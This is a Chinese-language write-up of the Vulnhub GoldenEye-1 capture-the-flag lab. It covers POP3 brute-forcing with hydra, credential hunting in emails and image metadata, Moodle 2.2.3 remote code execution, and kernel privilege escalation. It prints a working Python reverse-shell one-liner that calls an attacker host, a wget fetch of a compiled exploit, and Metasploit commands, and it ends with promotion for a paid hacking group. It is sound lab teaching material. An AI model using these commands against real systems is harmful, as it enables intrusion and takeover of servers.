靶场实战 | Vulnhub GlodenEye-1 使用msf
2023-12-27 23:13:25 Author: 渗透安全团队(查看原文) 阅读量:2 收藏 
在本地监听8888端口
title: Vulnhub-GlodenEye-1
categories:
  - VulnHub
tags:
  - Linux
  - nmap
  - gobuster
  - JavaScript
  - html
  - POP3
  - 邮件
  - hydra
  - 密码爆破
  - exiftool
  - strings
  - Moodle
  - RCE
  - searchsploit
  - metasploit
  - 域名解析
cover: /images/Vulnhub.png
abbrlink: 71172b32

0x01 靶机介绍

  • Name: GoldenEye: 1

  • Date release: 4 May 2018

  • Author: creosote

  • Series: GoldenEye

  • Description : The goal is to get root and capture the secret GoldenEye codes - flag.txt.

靶机下载地址:

https://www.vulnhub.com/entry/goldeneye-1,240/

0x02 侦查

端口探测

首先使用 nmap 进行端口扫描

nmap -p- -sV -sC -A 192.168.0.103 -oA nmap_GlodenEye-1

扫描结果显示目标开放了25、80、55006和55007端口

80端口

访问http://192.168.0.103提示存在/sev-home目录可登录

访问http://192.168.0.103/sev-home/出现登录界面

目录扫描

使用 gobuster 进行目录扫描未发现可用目录或文件

gobuster dir -u http://192.168.0.103 -w /usr/share/wordlists/dirb/big.txt

0x03 上线[www-data]

信息收集

查看网页源代码发现 JavaScript 文件terminal.js

访问http://192.168.0.103/terminal.js源码如下:

var data = [  {    GoldenEyeText: "<span><br/>Severnaya Auxiliary Control Station<br/>****TOP SECRET ACCESS****<br/>Accessing Server Identity<br/>Server Name:....................<br/>GOLDENEYE<br/><br/>User: UNKNOWN<br/><span>Naviagate to /sev-home/ to login</span>"  }];////Boris, make sure you update your default password. //My sources say MI6 maybe planning to infiltrate. //Be on the lookout for any suspicious network traffic....////I encoded you p@ssword below...////&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;////BTW Natalya says she can break your codes//var allElements = document.getElementsByClassName("typeing");for (var j = 0; j < allElements.length; j++) {  var currentElementId = allElements[j].id;  var currentElementIdContent = data[0][currentElementId];  var element = document.getElementById(currentElementId);  var devTypeText = currentElementIdContent;   var i = 0, isTag, text;  (function type() {    text = devTypeText.slice(0, ++i);    if (text === devTypeText) return;    element.innerHTML = text + `<span class='blinker'>&#32;</span>`;    var char = text.slice(-1);    if (char === "<") isTag = true;    if (char === ">") isTag = false;    if (isTag) return type();    setTimeout(type, 60);  })();}

针对注释中 HTML 编码的字符进行解码,同时找到用户名Boris、Natalya

&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;#解码后InvincibleHack3r

邮件服务

利用账号密码boris/InvincibleHack3r成功登录,根据提示需针对目标的 POP3 邮件服务

目标的55007端口为 POP3 邮件服务

使用 hydra 以收集到的账号配合密码字典爆破 POP3 服务

hydra 192.168.0.103 -s 55007 pop3 -L user.txt -P /usr/share/wordlists/fasttrack.txt -v

成功拿到两个账号密码

natalya/birdboris/secret1!

登录natalya账号查看邮件内容

nc 192.168.0.103 55007nc > user natalyanc > pass birdnc > listnc > retr 1nc > retr 2nc > retr ...nc > quit

其中两封邮件内容如下:

## 第一封Return-Path: <root@ubuntu>X-Original-To: natalyaDelivered-To: natalya@ubuntuReceived: from ok (localhost [127.0.0.1])        by ubuntu (Postfix) with ESMTP id D5EDA454B1        for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)Message-Id: <20180425024542.D5EDA454B1@ubuntu>Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)From: root@ubuntuNatalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.## 第二封Return-Path: <root@ubuntu>X-Original-To: natalyaDelivered-To: natalya@ubuntuReceived: from root (localhost [127.0.0.1])        by ubuntu (Postfix) with SMTP id 17C96454B1        for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)Message-Id: <20180425031956.17C96454B1@ubuntu>Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)From: root@ubuntusearchsploitOk Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)Ok, user creds are:username: xeniapassword: RCP90rulez!Boris verified her as a valid contractor so just create the account ok?And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir**Make sure to edit your host file since you usually work remote off-network....Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.

登录boris账号查看邮件内容

nc 192.168.0.103 55007nc > user borisnc > pass secret1!nc > listnc > retr 1nc > retr 2nc > retr ...nc > quit

两封邮件的内容如下:

## 第一封Return-Path: <[email protected]>X-Original-To: borisDelivered-To: boris@ubuntuReceived: from ok (localhost [127.0.0.1])        by ubuntu (Postfix) with SMTP id D9E47454B1        for <boris>; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)Message-Id: <20180425022326.D9E47454B1@ubuntu>Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)From: [email protected], this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.## 第二封Return-Path: <natalya@ubuntu>X-Original-To: borisDelivered-To: boris@ubuntuReceived: from ok (localhost [127.0.0.1])        by ubuntu (Postfix) with ESMTP id C3F2B454B1        for <boris>; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)Message-Id: <20180425024249.C3F2B454B1@ubuntu>Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)From: natalya@ubuntuBoris, I can break your codes!## 第三封Return-Path: <[email protected]>X-Original-To: borisDelivered-To: boris@ubuntuReceived: from janus (localhost [127.0.0.1])        by ubuntu (Postfix) with ESMTP id 4B9F4454B1        for <boris>; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)Message-Id: <20180425025235.4B9F4454B1@ubuntu>Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)From: [email protected],Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....PS - Keep security tight or we will be compromised.

分析邮件后成功找到账号密码xenia/RCP90rulez!,同时在本地设置域名解析

192.168.0.103 severnaya-station.com

访问http://severnaya-station.com/gnocertdir界面如下

通过xenia/RCP90rulez!成功登录

在My profile》Messages中找到 Dr Doak 用户的邮件

邮件内容如下:

09:24 PM: Greetings Xenia,As a new Contractor to our GoldenEye training I welcome you. Once your account has been complete, more courses will appear on your dashboard. If you have any questions message me via email, not here.My email username is...doakThank you,Cheers,09:24 PM: Greetings Xenia,As a new Contractor to our GoldenEye training I welcome you. Once your account has been complete, more courses will appear on your dashboard. If you have any questions message me via email, not here.My email username is...doakThank you,Cheers,Dr. Doak "The Doctor"Training Scientist - Sr Level Training Operating SupervisorGoldenEye Operations Center SectorLevel 14 - NO2 - id:998623-1334Campus 4, Building 57, Floor -8, Sector 6, cube 1,007Phone 555-193-826Cell 555-836-0944Office 555-846-9811Personal 555-826-9923Email: doak@Please Recycle before you print, Stay Green aka save the company money!"There's such a thing as Good Grief. Just ask Charlie Brown" - someguy"You miss 100% of the shots you don't shoot at" - Wayne G.THIS IS A SECURE MESSAGE DO NOT SEND IT UNLESSDr. Doak "The Doctor"Training Scientist - Sr Level Training Operating SupervisorGoldenEye Operations Center SectorLevel 14 - NO2 - id:998623-1334Campus 4, Building 57, Floor -8, Sector 6, cube 1,007Phone 555-193-826Cell 555-836-0944Office 555-846-9811Personal 555-826-9923Email: doak@Please Recycle before you print, Stay Green aka save the company money!"There's such a thing as Good Grief. Just ask Charlie Brown" - someguy"You miss 100% of the shots you don't shoot at" - Wayne G.THIS IS A SECURE MESSAGE DO NOT SEND IT UNLESS

由于存在doak账户,使用 hydra 再次爆破密码,成功拿到对应密码为goat

hydra 192.168.0.103 -s 55007 pop3 -l doak -P /usr/share/wordlists/fasttrack.txt -v

通过doak/goat成功登录 POP3 邮件服务,邮件中包含账号密码dr_doak/4England!
nc 192.168.0.103 55007nc > user doaknc > pass goatnc > listnc > retr 1nc > quit

利用账号密码dr_doak/4England!可登录网站页面,其中s3ret.txt内容如下:

007,I was able to capture this apps adm1n cr3ds through clear txt. Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here. Something juicy is located here: /dir007key/for-007.jpgAlso as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.
图片分析
提示需访问http://severnaya-station.com/dir007key/for-007.jpg

下载后通过strings命令或exiftool获取图片信息

strings for-007.jpgexiftool for-007.jpg

成功找到一串 Base64 字符编码:eFdpbnRlcjE5OTV4IQ==

经解码后为xWinter1995x!

echo "eFdpbnRlcjE5OTV4IQ==" | base64 -d## 解码后 xWinter1995x!

通过账号密码admin/xWinter1995x!成功登录管理员

Moodle RCE
通过指纹识别发现网站 CMS 为 Moodle,版本为2.2.3

漏洞查询
在谷歌中搜索相关漏洞,存在远程代码执行漏洞

exploit-db 中存在相关的利用代码,具体代码位于https://www.exploit-db.com/exploits/29324

当然也可以使用 searchsploit 搜索 Moodle 中存在的漏洞

手工利用
在Settings》site administration〉Plugins》Text Editor〉TinyMCE HTML editor中找到Spell engine,把google spell修改为PSpellShell,原因是目标主机中不存在gcc,只存在cc

在Settings》site administration〉Server》System paths中找到Path to aspell,在其中写入反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.20.10.4",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

在本地监听8888端口

nc -nvlp 8888

在Home》My profile》Blogs》Add a new entry中新建博客,点击Toggle Spellchecker后成功拿到反弹shell

通过 Python 切换 pty

python -c 'import pty;pty.spawn("/bin/bash")'

MSF利用
当然也可以通过 MSF 进行利用
msfconsolemsf > use exploit/multi/http/moodle_cmd_execmsf exploit(moodle_cmd_exec) > show optionsmsf exploit(moodle_cmd_exec) > set password xWinter1995x!msf exploit(moodle_cmd_exec) > set rhosts severnaya-station.commsf exploit(moodle_cmd_exec) > set targeturi /gnocertdirmsf exploit(moodle_cmd_exec) > run

但是本机未拿到会话,而 Kali 2018 中使用 payload 可以拿到shell

0x04 权限提升[root]

信息收集

查看系统内核版本为 Ubuntu 3.13.0

uname -a

使用 searchsploit 搜索相关提权脚本

searchsploit ubuntu 3.13.0

内核提权
选择37292.c进行提权
cp /usr/share/exploitdb/exploits/linux/local/37292.c ./

通过 gcc 编译 EXP

gcc 37292.c -o exp

在本地开启 http 服务

python -m SimpleHTTPServer 80

下载该 EXP 并赋予执行权限

wget http://172.20.10.4/expchmod 777 exp

执行 EXP 失败,提示缺少 gcc

./exp

因此需要把源码中的 gcc 修改为 cc 后再进行编译

cc 37292.c -o ex

再次执行成功提权为 root 用户

成功找到 flag,提示 flag 位于 web 目录下

cd /rootls -lacat .flag.txt

访问http://172.20.10.2/006-final/xvf7-flag成功拿到flag

0x05 知识星球


付费圈子

欢 迎 加 入 星 球 !

代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员

进成员内部群

星球的最近主题和星球内部工具一些展示

加入安全交流群

                               

关 注 有 礼

关注下方公众号回复“666”可以领取一套领取黑客成长秘籍

 还在等什么?赶紧点击下方名片关注学习吧!


干货|史上最全一句话木马

干货 | CS绕过vultr特征检测修改算法

实战 | 用中国人写的红队服务器搞一次内网穿透练习

实战 | 渗透某培训平台经历

实战 | 一次曲折的钓鱼溯源反制

免责声明
由于传播、利用本公众号渗透安全团队所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号渗透安全团队及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
好文分享收藏赞一下最美点在看哦

文章来源: http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247513377&idx=2&sn=7d9c9e03563ea66906adfa2f38a2acb6&chksm=c0a3c045e81c14a1c15b4150b03f0de5a711922f28839e294fa971d0951f0d3e33c1a3adddff&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh